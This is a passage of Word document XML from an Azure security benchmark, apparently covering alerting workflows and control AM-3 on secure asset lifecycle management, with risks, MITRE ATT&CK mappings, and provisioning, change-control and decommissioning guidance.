    <w:p w14:paraId="2DEC7873" w14:textId="6943FF23" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Defender for Cloud recommendations: Leverage Defender for Cloud security recommendations identifying resources requiring configuration changes or services operating outside security baselines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40434AB3" w14:textId="15DBCCE9" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Custom alert rules: Create custom Azure Monitor alert rules for specific service types or configuration patterns requiring security team notification and investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B0610C" w14:textId="7D22EA02" w:rsidR="00997142" w:rsidRDefault="00997142">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Alert and response workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E96FB3" w14:textId="4C99C80F" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Microsoft Teams and email notifications: Automated notifications to security operations and resource owners when unapproved services are provisioned or policy violations detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FAC232" w14:textId="7C1BAE20" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Azure Logic Apps integration: Automated workflows triggering security review tickets, stakeholder notifications, and escalation procedures for policy violation remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483ED074" w14:textId="06F0985A" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Microsoft Sentinel integration: Stream Azure Policy compliance data and service provisioning events to Microsoft Sentinel for security correlation and threat detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F86069E" w14:textId="4E62B9F7" w:rsidR="0073034E" w:rsidRDefault="0073034E" w:rsidP="0073034E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc242449517"/>
      <w:r w:rsidRPr="0073034E">
        <w:t>Asset lifecycle and access management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="604F7A2B" w14:textId="5B678F06" w:rsidR="009920C7" w:rsidRDefault="0073034E" w:rsidP="0073034E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc242449518"/>
      <w:r w:rsidRPr="0073034E">
        <w:t>AM-3: Ensure security of asset lifecycle management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="60349E52" w14:textId="5303C549" w:rsidR="00105F1F" w:rsidRDefault="0073034E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073034E">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C767650" w14:textId="27A3C217" w:rsidR="0073034E" w:rsidRDefault="0073034E" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r w:rsidRPr="0073034E">
        <w:t xml:space="preserve">Implement secure asset lifecycle management from provisioning through decommissioning with security-by-default configurations, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0073034E">
        <w:t>change</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0073034E">
        <w:t xml:space="preserve"> control processes, and systematic disposal procedures. Ensure all lifecycle phases include security validation, audit logging, and approval workflows for high-impact modifications to prevent security degradation and maintain compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA24303" w14:textId="0464D62E" w:rsidR="0073034E" w:rsidRDefault="0073034E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0073034E">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0073034E">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B5C050B" w14:textId="7D715C61" w:rsidR="0073034E" w:rsidRDefault="0073034E" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0073034E">
        <w:t>Insecure resource provisioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705910F0" w14:textId="0D07C0ED" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Resources deployed without security hardening, encryption, monitoring, or network controls operate in vulnerable state from inception creating immediate attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF0CE2E" w14:textId="14EE8E1D" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Configuration drift and unauthorized changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78639C2C" w14:textId="5BA80F7B" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="005F1BE6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:lastRenderedPageBreak/>
        <w:t>Uncontrolled resource modifications bypass security review processes leading to misconfigurations, compliance violations, and security control degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759DCA6" w14:textId="1C9B635E" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Orphaned resource accumulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780FD454" w14:textId="7979A6B8" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Resources persist after projects end or teams disband consuming budget while creating unmonitored attack surface with stale credentials and outdated security patches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F783DA0" w14:textId="07440E7A" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Incomplete decommissioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74090A0E" w14:textId="7F3F66A3" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Improper resource deletion leaves data remnants, storage accounts, network configurations, and identity assignments creating data exposure risks and compliance violations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E9A4D" w14:textId="35CED9BD" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Privilege escalation through lifecycle gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72377D4C" w14:textId="00CD9526" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Attackers exploit lifecycle management weaknesses to provision malicious resources, modify security configurations, or maintain persistence after detection attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D521F4C" w14:textId="370D28EC" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Audit trail gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1ACE2D" w14:textId="65FE6901" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Inadequate lifecycle documentation prevents forensic investigation, compliance demonstration, and root cause analysis of security incidents involving resource changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B2BD83" w14:textId="2A77DC94" w:rsidR="00F42055" w:rsidRDefault="00F42055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2055F6AD" w14:textId="0C879ECD" w:rsidR="00F42055" w:rsidRDefault="00F42055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A51C1" w14:textId="05EC6F1B" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t>create or modify system process (T1543) exploiting weak lifecycle controls to deploy persistent backdoors during resource provisioning without security review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45029D0D" w14:textId="5DEE75E6" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00521F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE93C90" w14:textId="56AFB0D8" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t>abuse elevation control mechanism (T1548) modifying resource permissions and access controls during lifecycle changes to gain unauthorized elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA1D3B0" w14:textId="11DA0513" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F24B9BA" w14:textId="794D82A7" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="390"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t>impair defenses (T1562) disabling security monitoring and logging during resource modification processes bypassing detection capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738202BE" w14:textId="13ACD1A7" w:rsidR="00F42055" w:rsidRPr="00F42055" w:rsidRDefault="00F42055" w:rsidP="00F42055">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-3.1: Implement secure resource provisioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2086E1A9" w14:textId="5FC16FDE" w:rsidR="00105F1F" w:rsidRDefault="00F42055" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Establish secure-by-default provisioning through these mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266EC8D0" w14:textId="16E4E476" w:rsidR="00F42055" w:rsidRDefault="00F42055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Secure-by-default provisioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D91B36A" w14:textId="20DC1FF6" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t xml:space="preserve">Azure Deployment Stacks for governance: Use Azure Deployment Stacks to combine Azure Policy assignments, RBAC role assignments, and resource templates into governed bundles. Deployment Stacks create deny assignments </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42055">
        <w:lastRenderedPageBreak/>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F42055">
        <w:t>DenyDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F42055">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F42055">
        <w:t>DenyWriteAndDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F42055">
        <w:t>) protecting managed resources and governance artifacts from unauthorized modification or deletion while enabling controlled updates through infrastructure-as-code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A1D301" w14:textId="0235FCCD" w:rsidR="00F42055" w:rsidRDefault="00F42055" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42055">
        <w:t>Infrastructure-as-code security: Hardened ARM templates and Terraform modules with encryption enabled, diagnostic logging configured, network security groups applied, and private endpoints deployed by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E2BA4E" w14:textId="439A0B56" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Policy-driven provisioning: Azure Policy automatically applies security configurations during resource creation including encryption requirements, diagnostic settings, and tagging mandates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470AF480" w14:textId="127CF828" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Private network default: Resources deployed with private endpoints and service endpoints by default disabling public internet access unless explicitly required and approved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B42953" w14:textId="52ABCE63" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve">Security scanning integration: Automated security scanning of infrastructure-as-code templates using tools like Checkov, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Terrascan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>, or Microsoft Defender for Cloud DevOps Security before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035CD3EF" w14:textId="68264EDA" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Provisioning approval workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0076C679" w14:textId="5A38FF88" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Azure DevOps approval gates: Require security team approval for production deployments involving sensitive data, internet-facing resources, or high-privilege configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1274D6F9" w14:textId="156A8884" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Change Advisory Board review: High-impact resource provisioning undergoes change advisory board review including security, compliance, and operations stakeholder evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719260E" w14:textId="6ABC5822" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Cost and security threshold triggers: Automated approval requirement triggers for resources exceeding cost thresholds or security sensitivity levels requiring leadership authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2140BEBA" w14:textId="14DA476A" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00FA74C0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-3.2: Implement asset lifecycle change control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D01D1C" w14:textId="1116AD8E" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Govern resource modifications through these change control mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D21DC22" w14:textId="598CA9E4" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Change control and governance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394725E9" w14:textId="67921255" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve">Azure Resource Locks: Deploy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>CanNotDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>ReadOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA74C0">
        <w:t xml:space="preserve"> locks on production resources preventing accidental deletion or modification without explicit lock removal approval requiring documented change request and security review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE4E8A3" w14:textId="60046881" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Azure Policy deny effects: Policies preventing security configuration degradation including disabling encryption, removing diagnostic settings, exposing resources to public internet, or modifying network security group rules without approval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2603D0" w14:textId="19588582" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Change tracking and audit: Azure Activity Log integration with Microsoft Sentinel tracking all resource modifications with security correlation, anomaly detection, and automated alerting for high-risk configuration changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ABB615" w14:textId="1EF5F949" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:lastRenderedPageBreak/>
        <w:t>Configuration drift detection: Azure Policy Guest Configuration detecting unauthorized configuration changes and triggering automated remediation workflows or security team notifications for production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CAB3F4" w14:textId="15ACD989" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Identity lifecycle management: Use Microsoft Entra ID Governance for automated identity lifecycle workflows managing service principal and managed identity provisioning, access reviews, and deprovisioning aligned with asset lifecycle stages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F59F596" w14:textId="11AC0DA0" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00FA74C0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-3.3: Implement systematic resource decommissioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B28E17" w14:textId="49C44206" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Execute secure resource decommissioning through these procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CBB599" w14:textId="22C173C8" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA74C0">
        <w:t>Secure decommissioning procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3899C8E0" w14:textId="2C64ACE1" w:rsidR="00FA74C0" w:rsidRDefault="00FA74C0" w:rsidP="00F52360">
      <w:pPr>
